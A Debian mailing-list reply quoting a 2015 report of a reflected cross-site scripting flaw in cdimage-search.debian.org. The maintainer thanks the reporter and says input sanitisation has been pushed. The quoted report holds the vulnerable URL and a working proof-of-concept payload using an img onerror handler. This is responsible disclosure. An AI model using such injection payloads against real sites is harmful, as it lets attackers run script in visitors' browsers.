On Thu, Oct 22, 2015 at 02:22:12PM +0000, Othmane Tamagart wrote:
>HI Debian ,
>
>I'm 0thm4n@WhiteHatSec , i am a Based-Student security researcher, Certified Pentester & i did a research i've found a Very-High Risk Vulnerability Called XSS ( Cross-site Scripting )
>
>Vulnerable File : http://cdimage-search.debian.org/?search_area=release&type=simple&query=
>
>Vulnerable URL + p0c : http://cdimage-search.debian.org/?search_area=release&type=simple&query=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%220thm4n%40WhiteHatSecurity%22%29%3B%3E&Search=Search&.cgifields=search_area&.cgifields=type
>
>POST DATA : "><img src=x onerror=prompt("0thm4nWhiteHatSecurity");>
>
>Proof-Of-Concept : http://i.imgur.com/uKtglGC.png
>
>About Vulnerability ( BUG ) : https://en.wikipedia.org/wiki/Cross-site_scripting
>
>Risk : Security Risk Critical
Hi Othmane,
Thanks very much for your report!
I've just pushed a fix to sanitise input here - please let us know if
you find anything further.
--
Steve McIntyre, Cambridge, UK. steve@einval.com
Google-bait: http://www.debian.org/CD/free-linux-cd
Debian does NOT ship free CDs. Please do NOT contact the mailing
lists asking us to send them to you.
Attachment:
signature.asc
Description: Digital signature